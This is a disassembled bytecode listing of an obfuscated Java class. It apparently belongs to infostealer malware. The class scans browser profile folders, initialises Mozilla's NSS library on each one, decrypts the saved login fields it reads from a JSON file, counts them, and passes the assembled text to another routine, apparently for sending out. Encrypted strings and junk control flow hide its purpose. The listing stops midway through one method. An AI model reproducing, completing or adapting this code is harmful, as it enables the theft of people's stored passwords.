Compiled from "wf.java"
public class a.b.d.wf {
  private static final java.lang.String r;

  private static final java.lang.String A;

  private static int W;

  private static int I;

  private static int i;

  private static final java.lang.String[] a;

  private static final java.lang.String[] b;

  private static final long c;

  private static final long d;

  public a.b.d.wf();
    Code:
         0: aload_0
         1: invokespecial #214                // Method java/lang/Object."<init>":()V
         4: return

  public static void r();
    Code:
         0: ldc2_w        #411                // long 82866118565129l
         3: lstore_0
         4: lload_0
         5: dup2
         6: ldc2_w        #419                // long 75445485096686l
         9: lxor
        10: lstore_2
        11: pop2
        12: iconst_0
        13: putstatic     #71                 // Field W:I
        16: iconst_0
        17: putstatic     #284                // Field I:I
        20: iconst_0
        21: putstatic     #56                 // Field i:I
        24: ldc           #5                  // int 980403600
        26: sipush        22748
        29: iadd
        30: ldc           #19                 // int -980403600
        32: sipush        -24661
        35: iadd
        36: lload_0
        37: l2i
        38: invokestatic  #185                // Method a:(III)Ljava/lang/String;
        41: invokestatic  #234                // Method a/b/d/dec.k:(Ljava/lang/String;)V
        44: lload_2
        45: iconst_1
        46: anewarray     #310                // class java/lang/Object
        49: dup_x2
        50: dup_x2
        51: pop
        52: invokestatic  #187                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
        55: iconst_0
        56: swap
        57: aastore
        58: invokestatic  #246                // Method y:([Ljava/lang/Object;)V
        61: ldc           #5                  // int 980403600
        63: sipush        22707
        66: iadd
        67: ldc           #5                  // int 980403600
        69: sipush        -25462
        72: i2c
        73: iadd
        74: lload_0
        75: l2i
        76: invokestatic  #185                // Method a:(III)Ljava/lang/String;
        79: ldc           #5                  // int 980403600
        81: sipush        22719
        84: iadd
        85: ldc           #19                 // int -980403600
        87: sipush        -30743
        90: iadd
        91: lload_0
        92: l2i
        93: invokestatic  #185                // Method a:(III)Ljava/lang/String;
        96: getstatic     #71                 // Field W:I
        99: invokestatic  #97                 // Method a/b/e/r.r3k:(Ljava/lang/String;Ljava/lang/String;I)V
       102: ldc           #5                  // int 980403600
       104: sipush        22709
       107: iadd
       108: ldc           #5                  // int 980403600
       110: sipush        19784
       113: iadd
       114: lload_0
       115: l2i
       116: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       119: ldc           #5                  // int 980403600
       121: sipush        22744
       124: iadd
       125: ldc           #19                 // int -980403600
       127: sipush        -25401
       130: iadd
       131: lload_0
       132: l2i
       133: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       136: getstatic     #284                // Field I:I
       139: invokestatic  #97                 // Method a/b/e/r.r3k:(Ljava/lang/String;Ljava/lang/String;I)V
       142: ldc           #5                  // int 980403600
       144: sipush        22709
       147: iadd
       148: ldc           #5                  // int 980403600
       150: sipush        19784
       153: iadd
       154: lload_0
       155: l2i
       156: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       159: ldc           #5                  // int 980403600
       161: sipush        22756
       164: iadd
       165: ldc           #19                 // int -980403600
       167: sipush        -27476
       170: iadd
       171: lload_0
       172: l2i
       173: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       176: getstatic     #56                 // Field i:I
       179: invokestatic  #97                 // Method a/b/e/r.r3k:(Ljava/lang/String;Ljava/lang/String;I)V
       182: return

  private static void y(java.lang.Object[]);
    Code:
         0: aload_0
         1: dup
         2: iconst_0
         3: aaload
         4: checkcast     #304                // class java/lang/Long
         7: invokevirtual #354                // Method java/lang/Long.longValue:()J
        10: lstore_1
        11: pop
        12: lload_1
        13: dup2
        14: ldc2_w        #409                // long 92827418085147l
        17: lxor
        18: lstore_3
        19: pop2
        20: getstatic     #268                // Field a/b/d/dec$NssSec.m:Z
        23: new           #29                 // class java/io/File
        26: dup
        27: getstatic     #395                // Field A:Ljava/lang/String;
        30: invokespecial #272                // Method java/io/File."<init>":(Ljava/lang/String;)V
        33: astore        6
        35: istore        5
        37: aload         6
        39: iload         5
        41: ifne          58
        44: invokevirtual #397                // Method java/io/File.exists:()Z
        47: ifne          56
        50: goto          54
        53: athrow
        54: return
        55: athrow
        56: aload         6
        58: invokedynamic #406,  0            // InvokeDynamic #0:accept:()Ljava/io/FileFilter;
        63: invokevirtual #338                // Method java/io/File.listFiles:(Ljava/io/FileFilter;)[Ljava/io/File;
        66: astore        7
        68: aload         7
        70: iload         5
        72: ifne          85
        75: ifnonnull     83
        78: goto          82
        81: athrow
        82: return
        83: aload         7
        85: astore        8
        87: aload         8
        89: arraylength
        90: istore        9
        92: iconst_0
        93: istore        10
        95: iload         10
        97: iload         9
        99: if_icmpge     152
       102: aload         8
       104: iload         10
       106: aaload
       107: astore        11
       109: lload_3
       110: aload         11
       112: iconst_2
       113: anewarray     #310                // class java/lang/Object
       116: dup_x1
       117: swap
       118: iconst_1
       119: swap
       120: aastore
       121: dup_x2
       122: dup_x2
       123: pop
       124: invokestatic  #187                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       127: iconst_0
       128: swap
       129: aastore
       130: invokestatic  #198                // Method r:([Ljava/lang/Object;)V
       133: getstatic     #94                 // Field d:J
       136: invokestatic  #176                // Method java/lang/Thread.sleep:(J)V
       139: goto          144
       142: astore        12
       144: iinc          10, 1
       147: iload         5
       149: ifeq          95
       152: return
      Exception table:
         from    to  target type
            68    78    81   Class java/lang/Exception
            44    55    55   Class java/lang/Exception
            37    50    53   Class java/lang/Exception
           133   139   142   Class java/lang/Exception

  private static void r(java.lang.Object[]);
    Code:
         0: aload_0
         1: dup
         2: iconst_0
         3: aaload
         4: checkcast     #304                // class java/lang/Long
         7: invokevirtual #354                // Method java/lang/Long.longValue:()J
        10: lstore_1
        11: dup
        12: iconst_1
        13: aaload
        14: checkcast     #29                 // class java/io/File
        17: astore_3
        18: pop
        19: lload_1
        20: dup2
        21: ldc2_w        #415                // long 44187025104512l
        24: lxor
        25: lstore        4
        27: dup2
        28: ldc2_w        #421                // long 91055023983816l
        31: lxor
        32: lstore        6
        34: pop2
        35: getstatic     #268                // Field a/b/d/dec$NssSec.m:Z
        38: aload_3
        39: invokevirtual #191                // Method java/io/File.getName:()Ljava/lang/String;
        42: astore        9
        44: istore        8
        46: new           #29                 // class java/io/File
        49: dup
        50: aload_3
        51: ldc           #1                  // int 778162590
        53: sipush        -17918
        56: i2c
        57: isub
        58: ldc           #8                  // int -778162590
        60: sipush        -31045
        63: i2c
        64: ineg
        65: isub
        66: lload_1
        67: l2i
        68: invokestatic  #185                // Method a:(III)Ljava/lang/String;
        71: invokespecial #255                // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
        74: iload         8
        76: ifne          390
        79: invokevirtual #397                // Method java/io/File.exists:()Z
        82: ifne          129
        85: new           #29                 // class java/io/File
        88: dup
        89: aload_3
        90: ldc           #1                  // int 778162590
        92: sipush        -17911
        95: i2c
        96: isub
        97: ldc           #1                  // int 778162590
        99: sipush        29585
       102: isub
       103: lload_1
       104: l2i
       105: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       108: invokespecial #255                // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
       111: iload         8
       113: lload_1
       114: lconst_0
       115: lcmp
       116: iflt          397
       119: ifne          390
       122: invokevirtual #397                // Method java/io/File.exists:()Z
       125: ifne          129
       128: return
       129: lload         6
       131: aload_3
       132: aload         9
       134: iconst_3
       135: anewarray     #310                // class java/lang/Object
       138: dup_x1
       139: swap
       140: iconst_2
       141: swap
       142: aastore
       143: dup_x1
       144: swap
       145: iconst_1
       146: swap
       147: aastore
       148: dup_x2
       149: dup_x2
       150: pop
       151: invokestatic  #187                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       154: iconst_0
       155: swap
       156: aastore
       157: invokestatic  #129                // Method t:([Ljava/lang/Object;)V
       160: aload_3
       161: ldc           #1                  // int 778162590
       163: sipush        -17914
       166: i2c
       167: isub
       168: ldc           #8                  // int -778162590
       170: sipush        -21452
       173: i2c
       174: ineg
       175: isub
       176: lload_1
       177: l2i
       178: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       181: ldc           #1                  // int 778162590
       183: sipush        -17945
       186: i2c
       187: isub
       188: ldc           #1                  // int 778162590
       190: sipush        -16855
       193: i2c
       194: isub
       195: lload_1
       196: l2i
       197: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       200: aload         9
       202: lload         4
       204: ldc           #1                  // int 778162590
       206: sipush        -17894
       209: i2c
       210: isub
       211: ldc           #8                  // int -778162590
       213: sipush        -22169
       216: i2c
       217: ineg
       218: isub
       219: lload_1
       220: l2i
       221: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       224: iconst_1
       225: bipush        7
       227: anewarray     #310                // class java/lang/Object
       230: dup_x1
       231: swap
       232: invokestatic  #299                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       235: bipush        6
       237: swap
       238: aastore
       239: dup_x1
       240: swap
       241: iconst_5
       242: swap
       243: aastore
       244: dup_x2
       245: dup_x2
       246: pop
       247: invokestatic  #187                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       250: iconst_4
       251: swap
       252: aastore
       253: dup_x1
       254: swap
       255: iconst_3
       256: swap
       257: aastore
       258: dup_x1
       259: swap
       260: iconst_2
       261: swap
       262: aastore
       263: dup_x1
       264: swap
       265: iconst_1
       266: swap
       267: aastore
       268: dup_x1
       269: swap
       270: iconst_0
       271: swap
       272: aastore
       273: invokestatic  #65                 // Method J:([Ljava/lang/Object;)V
       276: aload_3
       277: ldc           #1                  // int 778162590
       279: sipush        -17953
       282: i2c
       283: isub
       284: ldc           #1                  // int 778162590
       286: sipush        -29154
       289: i2c
       290: isub
       291: lload_1
       292: l2i
       293: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       296: ldc           #1                  // int 778162590
       298: sipush        -17909
       301: i2c
       302: isub
       303: ldc           #8                  // int -778162590
       305: sipush        -29265
       308: isub
       309: lload_1
       310: l2i
       311: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       314: aload         9
       316: lload         4
       318: ldc           #1                  // int 778162590
       320: sipush        -17892
       323: i2c
       324: isub
       325: ldc           #1                  // int 778162590
       327: sipush        -18720
       330: i2c
       331: isub
       332: lload_1
       333: l2i
       334: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       337: iconst_2
       338: bipush        7
       340: anewarray     #310                // class java/lang/Object
       343: dup_x1
       344: swap
       345: invokestatic  #299                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       348: bipush        6
       350: swap
       351: aastore
       352: dup_x1
       353: swap
       354: iconst_5
       355: swap
       356: aastore
       357: dup_x2
       358: dup_x2
       359: pop
       360: invokestatic  #187                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       363: iconst_4
       364: swap
       365: aastore
       366: dup_x1
       367: swap
       368: iconst_3
       369: swap
       370: aastore
       371: dup_x1
       372: swap
       373: iconst_2
       374: swap
       375: aastore
       376: dup_x1
       377: swap
       378: iconst_1
       379: swap
       380: aastore
       381: dup_x1
       382: swap
       383: iconst_0
       384: swap
       385: aastore
       386: invokestatic  #65                 // Method J:([Ljava/lang/Object;)V
       389: aload_3
       390: ldc           #1                  // int 778162590
       392: sipush        -17940
       395: i2c
       396: isub
       397: ldc           #8                  // int -778162590
       399: sipush        -15397
       402: i2c
       403: ineg
       404: isub
       405: lload_1
       406: l2i
       407: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       410: ldc           #1                  // int 778162590
       412: sipush        -17907
       415: i2c
       416: isub
       417: ldc           #1                  // int 778162590
       419: sipush        -17661
       422: i2c
       423: isub
       424: lload_1
       425: l2i
       426: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       429: aload         9
       431: lload         4
       433: ldc           #1                  // int 778162590
       435: sipush        -17946
       438: i2c
       439: isub
       440: ldc           #8                  // int -778162590
       442: sipush        -19666
       445: i2c
       446: ineg
       447: isub
       448: lload_1
       449: l2i
       450: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       453: iconst_3
       454: bipush        7
       456: anewarray     #310                // class java/lang/Object
       459: dup_x1
       460: swap
       461: invokestatic  #299                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       464: bipush        6
       466: swap
       467: aastore
       468: dup_x1
       469: swap
       470: iconst_5
       471: swap
       472: aastore
       473: dup_x2
       474: dup_x2
       475: pop
       476: invokestatic  #187                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       479: iconst_4
       480: swap
       481: aastore
       482: dup_x1
       483: swap
       484: iconst_3
       485: swap
       486: aastore
       487: dup_x1
       488: swap
       489: iconst_2
       490: swap
       491: aastore
       492: dup_x1
       493: swap
       494: iconst_1
       495: swap
       496: aastore
       497: dup_x1
       498: swap
       499: iconst_0
       500: swap
       501: aastore
       502: invokestatic  #65                 // Method J:([Ljava/lang/Object;)V
       505: return

  private static void t(java.lang.Object[]);
    Code:
         0: aload_0
         1: dup
         2: iconst_0
         3: aaload
         4: checkcast     #304                // class java/lang/Long
         7: invokevirtual #354                // Method java/lang/Long.longValue:()J
        10: lstore_1
        11: dup
        12: iconst_1
        13: aaload
        14: checkcast     #29                 // class java/io/File
        17: astore_3
        18: dup
        19: iconst_2
        20: aaload
        21: checkcast     #317                // class java/lang/String
        24: astore        4
        26: pop
        27: getstatic     #268                // Field a/b/d/dec$NssSec.m:Z
        30: new           #29                 // class java/io/File
        33: dup
        34: aload_3
        35: ldc           #12                 // int 1212004290
        37: sipush        -25513
        40: i2c
        41: isub
        42: ldc           #15                 // int -1212004290
        44: sipush        -29617
        47: isub
        48: lload_1
        49: l2i
        50: invokestatic  #185                // Method a:(III)Ljava/lang/String;
        53: invokespecial #255                // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
        56: astore        6
        58: iconst_3
        59: anewarray     #317                // class java/lang/String
        62: dup
        63: iconst_0
        64: ldc           #12                 // int 1212004290
        66: sipush        -25511
        69: i2c
        70: isub
        71: ldc           #12                 // int 1212004290
        73: sipush        22302
        76: isub
        77: lload_1
        78: l2i
        79: invokestatic  #185                // Method a:(III)Ljava/lang/String;
        82: invokestatic  #79                 // Method java/lang/System.getenv:(Ljava/lang/String;)Ljava/lang/String;
        85: ldc           #12                 // int 1212004290
        87: sipush        -25514
        90: i2c
        91: isub
        92: ldc           #15                 // int -1212004290
        94: sipush        -20078
        97: i2c
        98: ineg
        99: isub
       100: lload_1
       101: l2i
       102: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       105: invokedynamic #209,  0            // InvokeDynamic #1:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
       110: aastore
       111: dup
       112: iconst_1
       113: ldc           #12                 // int 1212004290
       115: sipush        -25521
       118: i2c
       119: isub
       120: ldc           #15                 // int -1212004290
       122: sipush        -26065
       125: isub
       126: lload_1
       127: l2i
       128: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       131: invokestatic  #79                 // Method java/lang/System.getenv:(Ljava/lang/String;)Ljava/lang/String;
       134: ldc           #12                 // int 1212004290
       136: sipush        -25484
       139: i2c
       140: isub
       141: ldc           #12                 // int 1212004290
       143: sipush        -19644
       146: i2c
       147: isub
       148: lload_1
       149: l2i
       150: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       153: invokedynamic #209,  0            // InvokeDynamic #1:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
       158: aastore
       159: dup
       160: iconst_2
       161: ldc           #12                 // int 1212004290
       163: sipush        -25471
       166: i2c
       167: isub
       168: ldc           #15                 // int -1212004290
       170: sipush        -27094
       173: isub
       174: lload_1
       175: l2i
       176: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       179: invokestatic  #79                 // Method java/lang/System.getenv:(Ljava/lang/String;)Ljava/lang/String;
       182: ldc           #12                 // int 1212004290
       184: sipush        -25494
       187: i2c
       188: isub
       189: ldc           #12                 // int 1212004290
       191: sipush        27635
       194: isub
       195: lload_1
       196: l2i
       197: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       200: invokedynamic #344,  0            // InvokeDynamic #2:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
       205: aastore
       206: invokestatic  #239                // Method a/b/d/dec.nssLoad:([Ljava/lang/String;)La/b/d/dec$NssLib;
       209: astore        7
       211: istore        5
       213: aload         6
       215: invokevirtual #397                // Method java/io/File.exists:()Z
       218: ifeq          239
       221: aload         7
       223: iload         5
       225: ifne          242
       228: goto          232
       231: athrow
       232: ifnonnull     240
       235: goto          239
       238: athrow
       239: return
       240: aload         7
       242: aload_3
       243: invokevirtual #143                // Method java/io/File.getAbsolutePath:()Ljava/lang/String;
       246: invokestatic  #149                // Method a/b/d/dec.nssInit:(La/b/d/dec$NssLib;Ljava/lang/String;)Z
       249: ifne          253
       252: return
       253: new           #110                // class java/lang/StringBuilder
       256: dup
       257: invokespecial #51                 // Method java/lang/StringBuilder."<init>":()V
       260: astore        8
       262: aload         6
       264: invokevirtual #162                // Method java/io/File.toPath:()Ljava/nio/file/Path;
       267: invokestatic  #333                // Method java/nio/file/Files.readString:(Ljava/nio/file/Path;)Ljava/lang/String;
       270: invokestatic  #316                // Method com/google/gson/JsonParser.parseString:(Ljava/lang/String;)Lcom/google/gson/JsonElement;
       273: invokevirtual #177                // Method com/google/gson/JsonElement.getAsJsonObject:()Lcom/google/gson/JsonObject;
       276: astore        9
       278: aload         9
       280: ldc           #12                 // int 1212004290
       282: sipush        -25498
       285: i2c
       286: isub
       287: ldc           #12                 // int 1212004290
       289: sipush        -22593
       292: i2c
       293: isub
       294: lload_1
       295: l2i
       296: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       299: iload         5
       301: ifne          339
       304: invokevirtual #339                // Method com/google/gson/JsonObject.has:(Ljava/lang/String;)Z
       307: ifeq          345
       310: goto          314
       313: athrow
       314: aload         9
       316: ldc           #12                 // int 1212004290
       318: sipush        -25498
       321: i2c
       322: isub
       323: ldc           #12                 // int 1212004290
       325: sipush        -22593
       328: i2c
       329: isub
       330: lload_1
       331: l2i
       332: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       335: goto          339
       338: athrow
       339: invokevirtual #30                 // Method com/google/gson/JsonObject.getAsJsonArray:(Ljava/lang/String;)Lcom/google/gson/JsonArray;
       342: goto          346
       345: aconst_null
       346: astore        10
       348: iload         5
       350: lload_1
       351: lconst_0
       352: lcmp
       353: iflt          920
       356: ifne          909
       359: aload         10
       361: ifnull        895
       364: goto          368
       367: athrow
       368: aload         10
       370: invokevirtual #307                // Method com/google/gson/JsonArray.iterator:()Ljava/util/Iterator;
       373: astore        11
       375: aload         11
       377: invokeinterface #294,  1          // InterfaceMethod java/util/Iterator.hasNext:()Z
       382: ifeq          895
       385: aload         11
       387: invokeinterface #285,  1          // InterfaceMethod java/util/Iterator.next:()Ljava/lang/Object;
       392: checkcast     #199                // class com/google/gson/JsonElement
       395: astore        12
       397: aload         12
       399: invokevirtual #177                // Method com/google/gson/JsonElement.getAsJsonObject:()Lcom/google/gson/JsonObject;
       402: astore        13
       404: lload_1
       405: lconst_0
       406: lcmp
       407: ifle          909
       410: aload         7
       412: iload         5
       414: ifne          903
       417: aload         13
       419: lload_1
       420: lconst_0
       421: lcmp
       422: iflt          491
       425: ldc           #12                 // int 1212004290
       427: sipush        -25472
       430: i2c
       431: isub
       432: ldc           #15                 // int -1212004290
       434: sipush        -30014
       437: i2c
       438: ineg
       439: isub
       440: lload_1
       441: l2i
       442: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       445: iload         5
       447: ifne          488
       450: goto          454
       453: athrow
       454: invokevirtual #339                // Method com/google/gson/JsonObject.has:(Ljava/lang/String;)Z
       457: ifeq          497
       460: goto          464
       463: athrow
       464: aload         13
       466: ldc           #12                 // int 1212004290
       468: sipush        -25488
       471: i2c
       472: isub
       473: ldc           #12                 // int 1212004290
       475: sipush        32724
       478: isub
       479: lload_1
       480: l2i
       481: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       484: goto          488
       487: athrow
       488: invokevirtual #47                 // Method com/google/gson/JsonObject.get:(Ljava/lang/String;)Lcom/google/gson/JsonElement;
       491: invokevirtual #42                 // Method com/google/gson/JsonElement.getAsString:()Ljava/lang/String;
       494: goto          499
       497: ldc           #4                  // String
       499: invokestatic  #259                // Method a/b/d/dec.nssDecrypt:(La/b/d/dec$NssLib;Ljava/lang/String;)Ljava/lang/String;
       502: astore        14
       504: aload         7
       506: aload         13
       508: lload_1
       509: lconst_0
       510: lcmp
       511: ifle          576
       514: ldc           #12                 // int 1212004290
       516: sipush        -25529
       519: i2c
       520: isub
       521: ldc           #12                 // int 1212004290
       523: sipush        20202
       526: isub
       527: lload_1
       528: l2i
       529: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       532: iload         5
       534: ifne          573
       537: invokevirtual #339                // Method com/google/gson/JsonObject.has:(Ljava/lang/String;)Z
       540: ifeq          582
       543: goto          547
       546: athrow
       547: aload         13
       549: ldc           #12                 // int 1212004290
       551: sipush        -25527
       554: i2c
       555: isub
       556: ldc           #15                 // int -1212004290
       558: sipush        -22411
       561: i2c
       562: ineg
       563: isub
       564: lload_1
       565: l2i
       566: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       569: goto          573
       572: athrow
       573: invokevirtual #47                 // Method com/google/gson/JsonObject.get:(Ljava/lang/String;)Lcom/google/gson/JsonElement;
       576: invokevirtual #42                 // Method com/google/gson/JsonElement.getAsString:()Ljava/lang/String;
       579: goto          584
       582: ldc           #4                  // String
       584: invokestatic  #259                // Method a/b/d/dec.nssDecrypt:(La/b/d/dec$NssLib;Ljava/lang/String;)Ljava/lang/String;
       587: astore        15
       589: aload         14
       591: iload         5
       593: lload_1
       594: lconst_0
       595: lcmp
       596: iflt          619
       599: ifne          611
       602: ifnull        890
       605: goto          609
       608: athrow
       609: aload         15
       611: lload_1
       612: lconst_0
       613: lcmp
       614: iflt          631
       617: iload         5
       619: ifne          631
       622: ifnull        890
       625: goto          629
       628: athrow
       629: aload         15
       631: invokevirtual #282                // Method java/lang/String.isEmpty:()Z
       634: lload_1
       635: lconst_0
       636: lcmp
       637: ifle          661
       640: iload         5
       642: ifne          661
       645: ifne          890
       648: goto          652
       651: athrow
       652: getstatic     #284                // Field I:I
       655: iconst_1
       656: iadd
       657: goto          661
       660: athrow
       661: putstatic     #284                // Field I:I
       664: aload         8
       666: ldc           #12                 // int 1212004290
       668: sipush        -25496
       671: i2c
       672: isub
       673: ldc           #15                 // int -1212004290
       675: sipush        -23599
       678: isub
       679: lload_1
       680: l2i
       681: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       684: invokevirtual #254                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       687: aload         13
       689: lload_1
       690: lconst_0
       691: lcmp
       692: iflt          756
       695: ldc           #12                 // int 1212004290
       697: sipush        -25501
       700: i2c
       701: isub
       702: ldc           #12                 // int 1212004290
       704: sipush        -20448
       707: i2c
       708: isub
       709: lload_1
       710: l2i
       711: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       714: iload         5
       716: ifne          753
       719: invokevirtual #339                // Method com/google/gson/JsonObject.has:(Ljava/lang/String;)Z
       722: ifeq          762
       725: goto          729
       728: athrow
       729: aload         13
       731: ldc           #12                 // int 1212004290
       733: sipush        -25477
       736: i2c
       737: isub
       738: ldc           #12                 // int 1212004290
       740: sipush        27916
       743: isub
       744: lload_1
       745: l2i
       746: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       749: goto          753
       752: athrow
       753: invokevirtual #47                 // Method com/google/gson/JsonObject.get:(Ljava/lang/String;)Lcom/google/gson/JsonElement;
       756: invokevirtual #42                 // Method com/google/gson/JsonElement.getAsString:()Ljava/lang/String;
       759: goto          764
       762: ldc           #4                  // String
       764: invokevirtual #254                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       767: ldc           #12                 // int 1212004290
       769: sipush        -25515
       772: i2c
       773: isub
       774: lload_1
       775: lconst_0
       776: lcmp
       777: iflt          804
       780: ldc           #15                 // int -1212004290
       782: sipush        -16850
       785: isub
       786: lload_1
       787: l2i
       788: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       791: invokevirtual #254                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       794: aload         14
       796: iload         5
       798: ifne          833
       801: invokevirtual #282                // Method java/lang/String.isEmpty:()Z
       804: ifeq          836
       807: goto          811
       810: athrow
       811: ldc           #12                 // int 1212004290
       813: sipush        -25489
       816: i2c
       817: isub
       818: ldc           #12                 // int 1212004290
       820: sipush        25012
       823: isub
       824: lload_1
       825: l2i
       826: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       829: goto          833
       832: athrow
       833: goto          838
       836: aload         14
       838: invokevirtual #254                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       841: ldc           #12                 // int 1212004290
       843: sipush        -25473
       846: i2c
       847: isub
       848: ldc           #12                 // int 1212004290
       850: sipush        -32298
       853: i2c
       854: isub
       855: lload_1
       856: l2i
       857: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       860: invokevirtual #254                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       863: aload         15
       865: invokevirtual #254                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       868: ldc           #12                 // int 1212004290
       870: sipush        -25530
       873: i2c
       874: isub
       875: ldc           #15                 // int -1212004290
       877: sipush        -24351
       880: isub
       881: lload_1
       882: l2i
       883: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       886: invokevirtual #254                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       889: pop
       890: iload         5
       892: ifeq          375
       895: lload_1
       896: lconst_0
       897: lcmp
       898: ifle          909
       901: aload         7
       903: invokeinterface #113,  1          // InterfaceMethod a/b/d/dec$NssLib.NSS_Shutdown:()I
       908: pop
       909: lload_1
       910: lconst_0
       911: lcmp
       912: ifle          981
       915: aload         8
       917: invokevirtual #351                // Method java/lang/StringBuilder.length:()I
       920: ifle          985
       923: aload         4
       925: ldc           #12                 // int 1212004290
       927: sipush        -25475
       930: i2c
       931: isub
       932: ldc           #15                 // int -1212004290
       934: sipush        -22021
       937: isub
       938: lload_1
       939: l2i
       940: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       943: swap
       944: ldc           #12                 // int 1212004290
       946: sipush        -25481
       949: i2c
       950: isub
       951: ldc           #12                 // int 1212004290
       953: sipush        27059
       956: isub
       957: lload_1
       958: l2i
       959: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       962: invokedynamic #253,  0            // InvokeDynamic #3:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
       967: aload         8
       969: invokevirtual #341                // Method java/lang/StringBuilder.toString:()Ljava/lang/String;
       972: getstatic     #342                // Field java/nio/charset/StandardCharsets.UTF_8:Ljava/nio/charset/Charset;
       975: invokevirtual #353                // Method java/lang/String.getBytes:(Ljava/nio/charset/Charset;)[B
       978: invokestatic  #200                // Method a/b/c/z.a:(Ljava/lang/String;[B)V
       981: goto          985
       984: athrow
       985: goto          990
       988: astore        8
       990: return
      Exception table:
         from    to  target type
           221   235   238   Class java/lang/Exception
           213   228   231   Class java/lang/Exception
           240   252   988   Class java/lang/Exception
           909   981   984   Class java/lang/Exception
           801   829   832   Class java/lang/Exception
           764   807   810   Class java/lang/Exception
           719   749   752   Class java/lang/Exception
           661   725   728   Class java/lang/Exception
           645   657   660   Class java/lang/Exception
           631   648   651   Class java/lang/Exception
           611   625   628   Class java/lang/Exception
           589   605   608   Class java/lang/Exception
           537   569   572   Class java/lang/Exception
           504   543   546   Class java/lang/Exception
           454   484   487   Class java/lang/Exception
           417   460   463   Class java/lang/Exception
           404   450   453   Class java/lang/Exception
           348   364   367   Class java/lang/Exception
           304   335   338   Class java/lang/Exception
           278   310   313   Class java/lang/Exception
           253   985   988   Class java/lang/Exception

  private static void J(java.lang.Object[]);
    Code:
         0: aload_0
         1: dup
         2: iconst_0
         3: aaload
         4: checkcast     #29                 // class java/io/File
         7: astore_1
         8: dup
         9: iconst_1
        10: aaload
        11: checkcast     #317                // class java/lang/String
        14: astore_2
        15: dup
        16: iconst_2
        17: aaload
        18: checkcast     #317                // class java/lang/String
        21: astore_3
        22: dup
        23: iconst_3
        24: aaload
        25: checkcast     #317                // class java/lang/String
        28: astore        4
        30: dup
        31: iconst_4
        32: aaload
        33: checkcast     #304                // class java/lang/Long
        36: invokevirtual #354                // Method java/lang/Long.longValue:()J
        39: lstore        5
        41: dup
        42: iconst_5
        43: aaload
        44: checkcast     #317                // class java/lang/String
        47: astore        7
        49: dup
        50: bipush        6
        52: aaload
        53: checkcast     #194                // class java/lang/Integer
        56: invokevirtual #179                // Method java/lang/Integer.intValue:()I
        59: istore        8
        61: pop
        62: getstatic     #268                // Field a/b/d/dec$NssSec.m:Z
        65: new           #29                 // class java/io/File
        68: dup
        69: aload_1
        70: aload_2
        71: invokespecial #255                // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
        74: astore        10
        76: istore        9
        78: aload         10
        80: iload         9
        82: ifne          134
        85: invokevirtual #397                // Method java/io/File.exists:()Z
        88: ifne          97
        91: goto          95
        94: athrow
        95: return
        96: athrow
        97: new           #29                 // class java/io/File
       100: dup
       101: ldc           #14                 // int 965592690
       103: sipush        -32106
       106: i2c
       107: iadd
       108: ldc           #17                 // int -965592690
       110: sipush        -29390
       113: i2c
       114: ineg
       115: iadd
       116: lload         5
       118: l2i
       119: invokestatic  #185                // Method a:(III)Ljava/lang/String;
